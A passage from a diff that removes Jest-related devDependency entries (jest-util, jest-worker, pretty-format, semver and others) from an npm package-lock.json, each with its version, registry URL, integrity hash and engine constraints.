"^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-snapshot/node_modules/lru-cache": { - "version": "6.0.0", - "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-6.0.0.tgz", - "integrity": "sha512-Jo6dJ04CmSjuznwJSS3pUeWmd/H0ffTlkXXgwZi+eq1UCmqQwCh+eLsYOYCwY991i2Fah4h1BEMCx4qThGbsiA==", - "dev": true, - "dependencies": { - "yallist": "^4.0.0" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/jest-snapshot/node_modules/semver": { - "version": "7.5.4", - "resolved": "https://registry.npmjs.org/semver/-/semver-7.5.4.tgz", - "integrity": "sha512-1bCSESV6Pv+i21Hvpxp3Dx+pSD8lIPt8uVjRrxAUt/nbswYc+tK6Y2btiULjd4+fnq15PX+nqQDC7Oft7WkwcA==", - "dev": true, - "dependencies": { - "lru-cache": "^6.0.0" - }, - "bin": { - "semver": "bin/semver.js" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/jest-snapshot/node_modules/yallist": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", - "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==", - "dev": true - }, - "node_modules/jest-util": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-util/-/jest-util-29.4.1.tgz", - "integrity": "sha512-bQy9FPGxVutgpN4VRc0hk6w7Hx/m6L53QxpDreTZgJd9gfx/AV2MjyPde9tGyZRINAUrSv57p2inGBu2dRLmkQ==", - "dev": true, - "dependencies": { - "@jest/types": "^29.4.1", - "@types/node": "*", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "graceful-fs": "^4.2.9", - "picomatch": "^2.2.3" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-validate": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-validate/-/jest-validate-29.4.1.tgz", - "integrity": "sha512-qNZXcZQdIQx4SfUB/atWnI4/I2HUvhz8ajOSYUu40CSmf9U5emil8EDHgE7M+3j9/pavtk3knlZBDsgFvv/SWw==", - "dev": true, - "dependencies": { - "@jest/types": "^29.4.1", - "camelcase": "^6.2.0", - "chalk": "^4.0.0", - "jest-get-type": "^29.2.0", - "leven": "^3.1.0", - "pretty-format": "^29.4.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-validate/node_modules/camelcase": { - "version": "6.3.0", - "resolved": "https://registry.npmjs.org/camelcase/-/camelcase-6.3.0.tgz", - "integrity": "sha512-Gmy6FhYlCY7uOElZUSbxo2UCDH8owEk996gkbrpsgGtrJLM3J7jGxl9Ic7Qwwj4ivOE5AWZWRMecDdF7hqGjFA==", - "dev": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/jest-watcher": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-watcher/-/jest-watcher-29.4.1.tgz", - "integrity": "sha512-vFOzflGFs27nU6h8dpnVRER3O2rFtL+VMEwnG0H3KLHcllLsU8y9DchSh0AL/Rg5nN1/wSiQ+P4ByMGpuybaVw==", - "dev": true, - "dependencies": { - "@jest/test-result": "^29.4.1", - "@jest/types": "^29.4.1", - "@types/node": "*", - "ansi-escapes": "^4.2.1", - "chalk": "^4.0.0", - "emittery": "^0.13.1", - "jest-util": "^29.4.1", - "string-length": "^4.0.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-worker": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-worker/-/jest-worker-29.4.1.tgz", - "integrity": "sha512-O9doU/S1EBe+yp/mstQ0VpPwpv0Clgn68TkNwGxL6/usX/KUW9Arnn4ag8C3jc6qHcXznhsT5Na1liYzAsuAbQ==", - "dev": true, - "dependencies": { - "@types/node": "*", - "jest-util": "^29.4.1", - "merge-stream": "^2.0.0", - "supports-color": "^8.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-worker/node_modules/supports-color": { - "version": "8.1.1", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-8.1.1.tgz", - "integrity": "sha512-MpUEN2OodtUzxvKQl72cUF7RQ5EiHsGvSsVG0ia9c5RbWGL2CI4C7EpPS8UTBIplnlzZiNuV56w+FuNxy3ty2Q==", - "dev": true, - "dependencies": { - "has-flag": "^4.0.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/chalk/supports-color?sponsor=1" - } - }, - "node_modules/js-tokens": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/js-tokens/-/js-tokens-4.0.0.tgz", - "integrity": "sha512-RdJUflcE3cUzKiMqQgsCu06FPu9UdIJO0beYbPhHN4k6apgJtifcoCtT9bcxOpYBtpD2kCM6Sbzg4CausW/PKQ==", - "dev": true - }, - "node_modules/js-yaml": { - "version": "3.14.1", - "resolved": "https://registry.npmjs.org/js-yaml/-/js-yaml-3.14.1.tgz", - "integrity": "sha512-okMH7OXXJ7YrN9Ok3/SXrnu4iX9yOk+25nqX4imS2npuvTYDmo/QEZoqwZkYaIDk3jVvBOTOIEgEhaLOynBS9g==", - "dev": true, - "dependencies": { - "argparse": "^1.0.7", - "esprima": "^4.0.0" - }, - "bin": { - "js-yaml": "bin/js-yaml.js" - } - }, - "node_modules/jsesc": { - "version": "2.5.2", - "resolved": "https://registry.npmjs.org/jsesc/-/jsesc-2.5.2.tgz", - "integrity": "sha512-OYu7XEzjkCQ3C5Ps3QIZsQfNpqoJyZZA99wd9aWd05NCtC5pWOkShK2mkL6HXQR6/Cy2lbNdPlZBpuQHXE63gA==", - "dev": true, - "bin": { - "jsesc": "bin/jsesc" - }, - "engines": { - "node": ">=4" - } - }, - "node_modules/json-parse-even-better-errors": { - "version": "2.3.1", - "resolved": "https://registry.npmjs.org/json-parse-even-better-errors/-/json-parse-even-better-errors-2.3.1.tgz", - "integrity": "sha512-xyFwyhro/JEof6Ghe2iz2NcXoj2sloNsWr/XsERDK/oiPCfaNhl5ONfp+jQdAZRQQ0IJWNzH9zIZF7li91kh2w==", - "dev": true - }, - "node_modules/json5": { - "version": "2.2.3", - "resolved": "https://registry.npmjs.org/json5/-/json5-2.2.3.tgz", - "integrity": "sha512-XmOWe7eyHYH14cLdVPoyg+GOH3rYX++KpzrylJwSW98t3Nk+U8XOl8FWKOgwtzdb8lXGf6zYwDUzeHMWfxasyg==", - "dev": true, - "bin": { - "json5": "lib/cli.js" - }, - "engines": { - "node": ">=6" - } - }, - "node_modules/kleur": { - "version": "3.0.3", - "resolved": "https://registry.npmjs.org/kleur/-/kleur-3.0.3.tgz", - "integrity": "sha512-eTIzlVOSUR+JxdDFepEYcBMtZ9Qqdef+rnzWdRZuMbOywu5tO2w2N7rqjoANZ5k9vywhL6Br1VRjUIgTQx4E8w==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/leven": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/leven/-/leven-3.1.0.tgz", - "integrity": "sha512-qsda+H8jTaUaN/x5vzW2rzc+8Rw4TAQ/4KjB46IwK5VH+IlVeeeje/EoZRpiXvIqjFgK84QffqPztGI3VBLG1A==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/lines-and-columns": { - "version": "1.2.4", - "resolved": "https://registry.npmjs.org/lines-and-columns/-/lines-and-columns-1.2.4.tgz", - "integrity": "sha512-7ylylesZQ/PV29jhEDl3Ufjo6ZX7gCqJr5F7PKrqc93v7fzSymt1BpwEU8nAUXs8qzzvqhbjhK5QZg6Mt/HkBg==", - "dev": true - }, - "node_modules/locate-path": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/locate-path/-/locate-path-5.0.0.tgz", - "integrity": "sha512-t7hw9pI+WvuwNJXwk5zVHpyhIqzg2qTlklJOf0mVxGSbe3Fp2VieZcduNYjaLDoy6p9uGpQEGWG87WpMKlNq8g==", - "dev": true, - "dependencies": { - "p-locate": "^4.1.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/lru-cache": { - "version": "5.1.1", - "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-5.1.1.tgz", - "integrity": "sha512-KpNARQA3Iwv+jTA0utUVVbrh+Jlrr1Fv0e56GGzAFOXN7dk/FviaDW8LHmK52DlcH4WP2n6gI8vN1aesBFgo9w==", - "dev": true, - "dependencies": { - "yallist": "^3.0.2" - } - }, - "node_modules/make-dir": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/make-dir/-/make-dir-3.1.0.tgz", - "integrity": "sha512-g3FeP20LNwhALb/6Cz6Dd4F2ngze0jz7tbzrD2wAV+o9FeNHe4rL+yK2md0J/fiSf1sa1ADhXqi5+oVwOM/eGw==", - "dev": true, - "dependencies": { - "semver": "^6.0.0" - }, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/makeerror": { - "version": "1.0.12", - "resolved": "https://registry.npmjs.org/makeerror/-/makeerror-1.0.12.tgz", - "integrity": "sha512-JmqCvUhmt43madlpFzG4BQzG2Z3m6tvQDNKdClZnO3VbIudJYmxsT0FNJMeiB2+JTSlTQTSbU8QdesVmwJcmLg==", - "dev": true, - "dependencies": { - "tmpl": "1.0.5" - } - }, - "node_modules/merge-stream": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/merge-stream/-/merge-stream-2.0.0.tgz", - "integrity": "sha512-abv/qOcuPfk3URPfDzmZU1LKmuw8kT+0nIHvKrKgFrwifol/doWcdA4ZqsWQ8ENrFKkd67Mfpo/LovbIUsbt3w==", - "dev": true - }, - "node_modules/micromatch": { - "version": "4.0.5", - "resolved": "https://registry.npmjs.org/micromatch/-/micromatch-4.0.5.tgz", - "integrity": "sha512-DMy+ERcEW2q8Z2Po+WNXuw3c5YaUSFjAO5GsJqfEl7UjvtIuFKO6ZrKvcItdy98dwFI2N1tg3zNIdKaQT+aNdA==", - "dev": true, - "dependencies": { - "braces": "^3.0.2", - "picomatch": "^2.3.1" - }, - "engines": { - "node": ">=8.6" - } - }, - "node_modules/mimic-fn": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/mimic-fn/-/mimic-fn-2.1.0.tgz", - "integrity": "sha512-OqbOk5oEQeAZ8WXWydlu9HJjz9WVdEIvamMCcXmuqUYjTknH/sqsWvhQ3vgwKFRR1HpjvNBKQ37nbJgYzGqGcg==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/minimatch": { - "version": "3.1.2", - "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-3.1.2.tgz", - "integrity": "sha512-J7p63hRiAjw1NDEww1W7i37+ByIrOWO5XQQAzZ3VOcL0PNybwpfmV/N05zFAzwQ9USyEcX6t3UO+K5aqBQOIHw==", - "dev": true, - "dependencies": { - "brace-expansion": "^1.1.7" - }, - "engines": { - "node": "*" - } - }, - "node_modules/ms": { - "version": "2.1.2", - "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.2.tgz", - "integrity": "sha512-sGkPx+VjMtmA6MX27oA4FBFELFCZZ4S4XqeGOXCv68tT+jb3vk/RyaKWP0PTKyWtmLSM0b+adUTEvbs1PEaH2w==", - "dev": true - }, - "node_modules/natural-compare": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/natural-compare/-/natural-compare-1.4.0.tgz", - "integrity": "sha512-OWND8ei3VtNC9h7V60qff3SVobHr996CTwgxubgyQYEpg290h9J0buyECNNJexkFm5sOajh5G116RYA1c8ZMSw==", - "dev": true - }, - "node_modules/node-int64": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/node-int64/-/node-int64-0.4.0.tgz", - "integrity": "sha512-O5lz91xSOeoXP6DulyHfllpq+Eg00MWitZIbtPfoSEvqIHdl5gfcY6hYzDWnj0qD5tz52PI08u9qUvSVeUBeHw==", - "dev": true - }, - "node_modules/node-releases": { - "version": "2.0.9", - "resolved": "https://registry.npmjs.org/node-releases/-/node-releases-2.0.9.tgz", - "integrity": "sha512-2xfmOrRkGogbTK9R6Leda0DGiXeY3p2NJpy4+gNCffdUvV6mdEJnaDEic1i3Ec2djAo8jWYoJMR5PB0MSMpxUA==", - "dev": true - }, - "node_modules/normalize-path": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/normalize-path/-/normalize-path-3.0.0.tgz", - "integrity": "sha512-6eZs5Ls3WtCisHWp9S2GUy8dqkpGi4BVSz3GaqiE6ezub0512ESztXUwUB6C6IKbQkY2Pnb/mD4WYojCRwcwLA==", - "dev": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/npm-run-path": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/npm-run-path/-/npm-run-path-4.0.1.tgz", - "integrity": "sha512-S48WzZW777zhNIrn7gxOlISNAqi9ZC/uQFnRdbeIHhZhCA6UqpkOT8T1G7BvfdgP4Er8gF4sUbaS0i7QvIfCWw==", - "dev": true, - "dependencies": { - "path-key": "^3.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/once": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", - "integrity": "sha512-lNaJgI+2Q5URQBkccEKHTQOPaXdUxnZZElQTZY0MFUAuaEqe1E+Nyvgdz/aIyNi6Z9MzO5dv1H8n58/GELp3+w==", - "dev": true, - "dependencies": { - "wrappy": "1" - } - }, - "node_modules/onetime": { - "version": "5.1.2", - "resolved": "https://registry.npmjs.org/onetime/-/onetime-5.1.2.tgz", - "integrity": "sha512-kbpaSSGJTWdAY5KPVeMOKXSrPtr8C8C7wodJbcsd51jRnmD+GZu8Y0VoU6Dm5Z4vWr0Ig/1NKuWRKf7j5aaYSg==", - "dev": true, - "dependencies": { - "mimic-fn": "^2.1.0" - }, - "engines": { - "node": ">=6" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/p-limit": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-3.1.0.tgz", - "integrity": "sha512-TYOanM3wGwNGsZN2cVTYPArw454xnXj5qmWF1bEoAc4+cU/ol7GVh7odevjp1FNHduHc3KZMcFduxU5Xc6uJRQ==", - "dev": true, - "dependencies": { - "yocto-queue": "^0.1.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/p-locate": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/p-locate/-/p-locate-4.1.0.tgz", - "integrity": "sha512-R79ZZ/0wAxKGu3oYMlz8jy/kbhsNrS7SKZ7PxEHBgJ5+F2mtFW2fK2cOtBh1cHYkQsbzFV7I+EoRKe6Yt0oK7A==", - "dev": true, - "dependencies": { - "p-limit": "^2.2.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/p-locate/node_modules/p-limit": { - "version": "2.3.0", - "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-2.3.0.tgz", - "integrity": "sha512-//88mFWSJx8lxCzwdAABTJL2MyWB12+eIY7MDL2SqLmAkeKU9qxRvWuSyTjm3FUmpBEMuFfckAIqEaVGUDxb6w==", - "dev": true, - "dependencies": { - "p-try": "^2.0.0" - }, - "engines": { - "node": ">=6" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/p-try": { - "version": "2.2.0", - "resolved": "https://registry.npmjs.org/p-try/-/p-try-2.2.0.tgz", - "integrity": "sha512-R4nPAVTAU0B9D35/Gk3uJf/7XYbQcyohSKdvAxIRSNghFl4e71hVoGnBNQz9cWaXxO2I10KTC+3jMdvvoKw6dQ==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/parse-json": { - "version": "5.2.0", - "resolved": "https://registry.npmjs.org/parse-json/-/parse-json-5.2.0.tgz", - "integrity": "sha512-ayCKvm/phCGxOkYRSCM82iDwct8/EonSEgCSxWxD7ve6jHggsFl4fZVQBPRNgQoKiuV/odhFrGzQXZwbifC8Rg==", - "dev": true, - "dependencies": { - "@babel/code-frame": "^7.0.0", - "error-ex": "^1.3.1", - "json-parse-even-better-errors": "^2.3.0", - "lines-and-columns": "^1.1.6" - }, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/path-exists": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/path-exists/-/path-exists-4.0.0.tgz", - "integrity": "sha512-ak9Qy5Q7jYb2Wwcey5Fpvg2KoAc/ZIhLSLOSBmRmygPsGwkVVt0fZa0qrtMz+m6tJTAHfZQ8FnmB4MG4LWy7/w==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/path-is-absolute": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/path-is-absolute/-/path-is-absolute-1.0.1.tgz", - "integrity": "sha512-AVbw3UJ2e9bq64vSaS9Am0fje1Pa8pbGqTTsmXfaIiMpnr5DlDhfJOuLj9Sf95ZPVDAUerDfEk88MPmPe7UCQg==", - "dev": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/path-key": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/path-key/-/path-key-3.1.1.tgz", - "integrity": "sha512-ojmeN0qd+y0jszEtoY48r0Peq5dwMEkIlCOu6Q5f41lfkswXuKtYrhgoTpLnyIcHm24Uhqx+5Tqm2InSwLhE6Q==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/path-parse": { - "version": "1.0.7", - "resolved": "https://registry.npmjs.org/path-parse/-/path-parse-1.0.7.tgz", - "integrity": "sha512-LDJzPVEEEPR+y48z93A0Ed0yXb8pAByGWo/k5YYdYgpY2/2EsOsksJrq7lOHxryrVOn1ejG6oAp8ahvOIQD8sw==", - "dev": true - }, - "node_modules/picocolors": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/picocolors/-/picocolors-1.0.0.tgz", - "integrity": "sha512-1fygroTLlHu66zi26VoTDv8yRgm0Fccecssto+MhsZ0D/DGW2sm8E8AjW7NU5VVTRt5GxbeZ5qBuJr+HyLYkjQ==", - "dev": true - }, - "node_modules/picomatch": { - "version": "2.3.1", - "resolved": "https://registry.npmjs.org/picomatch/-/picomatch-2.3.1.tgz", - "integrity": "sha512-JU3teHTNjmE2VCGFzuY8EXzCDVwEqB2a8fsIvwaStHhAWJEeVd1o1QD80CU6+ZdEXXSLbSsuLwJjkCBWqRQUVA==", - "dev": true, - "engines": { - "node": ">=8.6" - }, - "funding": { - "url": "https://github.com/sponsors/jonschlinkert" - } - }, - "node_modules/pirates": { - "version": "4.0.5", - "resolved": "https://registry.npmjs.org/pirates/-/pirates-4.0.5.tgz", - "integrity": "sha512-8V9+HQPupnaXMA23c5hvl69zXvTwTzyAYasnkb0Tts4XvO4CliqONMOnvlq26rkhLC3nWDFBJf73LU1e1VZLaQ==", - "dev": true, - "engines": { - "node": ">= 6" - } - }, - "node_modules/pkg-dir": { - "version": "4.2.0", - "resolved": "https://registry.npmjs.org/pkg-dir/-/pkg-dir-4.2.0.tgz", - "integrity": "sha512-HRDzbaKjC+AOWVXxAU/x54COGeIv9eb+6CkDSQoNTt4XyWoIJvuPsXizxu/Fr23EiekbtZwmh1IcIG/l/a10GQ==", - "dev": true, - "dependencies": { - "find-up": "^4.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/pretty-format": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/pretty-format/-/pretty-format-29.4.1.tgz", - "integrity": "sha512-dt/Z761JUVsrIKaY215o1xQJBGlSmTx/h4cSqXqjHLnU1+Kt+mavVE7UgqJJO5ukx5HjSswHfmXz4LjS2oIJfg==", - "dev": true, - "dependencies": { - "@jest/schemas": "^29.4.0", - "ansi-styles": "^5.0.0", - "react-is": "^18.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/pretty-format/node_modules/ansi-styles": { - "version": "5.2.0", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-5.2.0.tgz", - "integrity": "sha512-Cxwpt2SfTzTtXcfOlzGEee8O+c+MmUgGrNiBcXnuWxuFJHe6a5Hz7qwhwe5OgaSYI0IJvkLqWX1ASG+cJOkEiA==", - "dev": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/chalk/ansi-styles?sponsor=1" - } - }, - "node_modules/prompts": { - "version": "2.4.2", - "resolved": "https://registry.npmjs.org/prompts/-/prompts-2.4.2.tgz", - "integrity": "sha512-NxNv/kLguCA7p3jE8oL2aEBsrJWgAakBpgmgK6lpPWV+WuOmY6r2/zbAVnP+T8bQlA0nzHXSJSJW0Hq7ylaD2Q==", - "dev": true, - "dependencies": { - "kleur": "^3.0.3", - "sisteransi": "^1.0.5" - }, - "engines": { - "node": ">= 6" - } - }, - "node_modules/react-is": { - "version": "18.2.0", - "resolved": "https://registry.npmjs.org/react-is/-/react-is-18.2.0.tgz", - "integrity": "sha512-xWGDIW6x921xtzPkhiULtthJHoJvBbF3q26fzloPCK0hsvxtPVelvftw3zjbHWSkR2km9Z+4uxbDDK/6Zw9B8w==", - "dev": true - }, - "node_modules/require-directory": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/require-directory/-/require-directory-2.1.1.tgz", - "integrity": "sha512-fGxEI7+wsG9xrvdjsrlmL22OMTTiHRwAMroiEeMgq8gzoLC/PQr7RsRDSTLUg/bZAZtF+TVIkHc6/4RIKrui+Q==", - "dev": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/resolve": { - "version": "1.22.1", - "resolved": "https://registry.npmjs.org/resolve/-/resolve-1.22.1.tgz", - "integrity": "sha512-nBpuuYuY5jFsli/JIs1oldw6fOQCBioohqWZg/2hiaOybXOft4lonv85uDOKXdf8rhyK159cxU5cDcK/NKk8zw==", - "dev": true, - "dependencies": { - "is-core-module": "^2.9.0", - "path-parse": "^1.0.7", - "supports-preserve-symlinks-flag": "^1.0.0" - }, - "bin": { - "resolve": "bin/resolve" - }, - "funding": { - "url": "https://github.com/sponsors/ljharb" - } - }, - "node_modules/resolve-cwd": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/resolve-cwd/-/resolve-cwd-3.0.0.tgz", - "integrity": "sha512-OrZaX2Mb+rJCpH/6CpSqt9xFVpN++x01XnN2ie9g6P5/3xelLAkXWVADpdz1IHD/KFfEXyE6V0U01OQ3UO2rEg==", - "dev": true, - "dependencies": { - "resolve-from": "^5.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/resolve-from": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/resolve-from/-/resolve-from-5.0.0.tgz", - "integrity": "sha512-qYg9KP24dD5qka9J47d0aVky0N+b4fTU89LN9iDnjB5waksiC49rvMB0PrUJQGoTmH50XPiqOvAjDfaijGxYZw==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/resolve.exports": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/resolve.exports/-/resolve.exports-2.0.0.tgz", - "integrity": "sha512-6K/gDlqgQscOlg9fSRpWstA8sYe8rbELsSTNpx+3kTrsVCzvSl0zIvRErM7fdl9ERWDsKnrLnwB+Ne89918XOg==", - "dev": true, - "engines": { - "node": ">=10" - } - }, - "node_modules/semver": { - "version": "6.3.1", - "resolved": "https://registry.npmjs.org/semver/-/semver-6.3.1.tgz", - "integrity": "sha512-BR7VvDCVHO+q2xBEWskxS6DJE1qRnb7DxzUrogb71CWoSficBxYsiAGd+Kl0mmq/MprG9yArRkyrQxTO6XjMzA==", - "dev": true, - "bin": { - "semver": "bin/semver.js" - } - }, - "node_modules/shebang-command": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/shebang-command/-/shebang-command-2.0.0.tgz", - "integrity": "sha512-kHxr2zZpYtdmrN1qDjrrX/Z1rR1kG8Dx+gkpK1G4eXmvXswmcE1hTWBWYUzlraYw1/yZp6YuDY77YtvbN0dmDA==", - "dev": true, - "dependencies": { - "shebang-regex": "^3.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/shebang-regex": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/shebang-regex/-/shebang-regex-3.0.0.tgz", - "integrity": "sha512-7++dFhtcx3353uBaq8DDR4NuxBetBzC7ZQOhmTQInHEd6bSrXdiEyzCvG07Z44UYdLShWUyXt5M/yhz8ekcb1A==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/signal-exit": { - "version": "3.0.7", - "resolved": "https://registry.npmjs.org/signal-exit/-/signal-exit-3.0.7.tgz", - "integrity": "sha512-wnD2ZE+l+SPC/uoS0vXeE9L1+0wuaMqKlfz9AMUo38JsyLSBWSFcHR1Rri62LZc12vLr1gb3jl7iwQhgwpAbGQ==", - "dev": true - }, - "node_modules/sisteransi": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/sisteransi/-/sisteransi-1.0.5.tgz", - "integrity": "sha512-bLGGlR1QxBcynn2d5YmDX4MGjlZvy2MRBDRNHLJ8VI6l6+9FUiyTFNJ0IveOSP0bcXgVDPRcfGqA0pjaqUpfVg==", - "dev": true - }, - "node_modules/slash": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/slash/-/slash-3.0.0.tgz", - "integrity": "sha512-g9Q1haeby36OSStwb4ntCGGGaKsaVSjQ68fBxoQcutl5fS1vuY18H3wSt3jFyFtrkx+Kz0V1G85A4MyAdDMi2Q==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/source-map": { - "version": "0.6.1", - "resolved": "https://registry.npmjs.org/source-map/-/source-map-0.6.1.tgz", - "integrity": "sha512-UjgapumWlbMhkBgzT7Ykc5YXUT46F0iKu8SGXq0bcwP5dz/h0Plj6enJqjz1Zbq2l5WaqYnrVbwWOWMyF3F47g==", - "dev": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/source-map-support": { - "version": "0.5.13", - "resolved": "https://registry.npmjs.org/source-map-support/-/source-map-support-0.5.13.tgz", - "integrity": "sha512-SHSKFHadjVA5oR4PPqhtAVdcBWwRYVd6g6cAXnIbRiIwc2EhPrTuKUBdSLvlEKyIP3GCf89fltvcZiP9MMFA1w==", - "dev": true, - "dependencies": { - "buffer-from": "^1.0.0", - "source-map": "^0.6.0" - } - }, - "node_modules/sprintf-js": { - "version": "1.0.3", - "resolved": "https://registry.npmjs.org/sprintf-js/-/sprintf-js-1.0.3.tgz", - "integrity": "sha512-D9cPgkvLlV3t3IzL0D0YLvGA9Ahk4PcvVwUbN0dSGr1aP0Nrt4AEnTUbuGvquEC0mA64Gqt1fzirlRs5ibXx8g==", - "dev": true - }, - "node_modules/stack-utils": { - "version": "2.0.6", - "resolved": "https://registry.npmjs.org/stack-utils/-/stack-utils-2.0.6.tgz", - "integrity": "sha512-XlkWvfIm6RmsWtNJx+uqtKLS8eqFbxUg0ZzLXqY0caEy9l7hruX8IpiDnjsLavoBgqCCR71TqWO8MaXYheJ3RQ==", - "dev": true, - "dependencies": { - "escape-string-regexp": "^2.0.0" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/string-length": { - "version": "4.0.2", - "resolved": "https://registry.npmjs.org/string-length/-/string-length-4.0.2.tgz", - "integrity": "sha512-+l6rNN5fYHNhZZy41RXsYptCjA2Igmq4EG7kZAYFQI1E1VTXarr6ZPXBg6eq7Y6eK4FEhY6AJlyuFIb/v/S0VQ==", - "dev": true, - "dependencies": { - "char-regex": "^1.0.2", - "strip-ansi": "^6.0.0" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/string-width": { - "version": "4.2.3", - "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", - "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", - "dev": true, - "dependencies": { - "emoji-regex": "^8.0.0", - "is-fullwidth-code-point": "^3.0.0", - "strip-ansi": "^6.0.1" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/strip-ansi": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", - "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", - "dev": true, - "dependencies": { - "ansi-regex": "^5.0.1" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/strip-bom": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/strip-bom/-/strip-bom-4.0.0.tgz", - "integrity": "sha512-3xurFv5tEgii33Zi8Jtp55wEIILR9eh34FAW00PZf+JnSsTmV/ioewSgQl97JHvgjoRGwPShsWm+IdrxB35d0w==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/strip-final-newline": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/strip-final-newline/-/strip-final-newline-2.0.0.tgz", - "integrity": "sha512-BrpvfNAE3dcvq7ll3xVumzjKjZQ5tI1sEUIKr3Uoks0XUl45St3FlatVqef9prk4jRDzhW6WZg+3bk93y6pLjA==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/strip-json-comments": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/strip-json-comments/-/strip-json-comments-3.1.1.tgz", - "integrity": 